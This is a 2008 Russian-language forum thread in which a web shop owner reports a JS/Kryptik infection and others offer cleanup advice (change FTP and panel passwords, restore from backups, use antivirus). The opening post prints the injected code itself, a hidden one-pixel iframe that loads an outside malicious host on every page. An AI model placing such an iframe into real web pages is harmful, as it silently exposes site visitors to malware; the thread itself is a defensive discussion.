Вирусы SS методы борьбы с ними

Статус
В этой теме нельзя размещать новые ответы.

jujik

Создатель
Регистрация
1 Июл 2007
Сообщения
42
Реакции
10
Думаю тема будет актуальной для всех;)

Добавлено через 5 минут
Сразу и размочим ее =)
Ребята 13.12.2008 мне закинули троян JS/Kryptik в магазин
он формирует в самом верху ссылку вида
PHP:
<iframe src=\"http://thedeadpit.com/?click=ХХХХХХХ\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>

прописывается в файликах index.php i smarty/plugins/modifier.default.php

у меня что-то подобное было пол года, в другом магазине.
кто сталкивался отпишитесь плз!

Добавлено через 7 минут
п.с. в логах никакого криминала =(
 
а эту ссылку видно при простом пользовательском просмотре сайта или только через код?
 
а эту ссылку видно при простом пользовательском просмотре сайта или только через код?

конечно видно =)) на всех страницах сверху (см. HTML)

Добавлено через 5 минут
Цитируем FAQ:

Если при заходе на Ваш сайт антивирус говорит, что он обнаружил вирус - это значит что файлы Вашего сайта были модифицированы.

В последнее время в интернете появился вирус, который попав на компьютер делает следующее:
- перехватывает все пароли FTP
- передает эти данные скрипту, который зайдя на FTP меняет все индексные файлы, добавляя в код страницы строчки со ссылкой на вирус. И таким образом открывая сайт можно заразится вирусом.
Мы настоятельно рекомендуем использовать только хорошее программное обеспечение, во избежание таких проблем.
После того как Вы вылечите систему, Вам следует обязательно сменить Ваши пароли на вход в Вашу панель управления, FTP, Почту, Базы данных. Скрипт их уже украл.
После, во всех скриптах (которые заражены) убрать лишние строчки, или заменить их с резервных копий.
Действительно, я работаю с двух компьютеров, один чистый, а на другом уже куча вирусов оказалось =)))
По теме, ещё нашол что в основном у тех такие проблемы кто пользуется Total Commander для работы с сайтом через фтп. Я пользуюсь тоталом :)
 
  • Заблокирован
  • #6
Пароли в тотале не храни и будет тебе счастье.
 
поставь антивирь с сетевым экраном + хайд открытых портов или файрволл и обновляй базы каждые 2-3 дня
 
хорошо все же иногда антивирь юзать :)
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху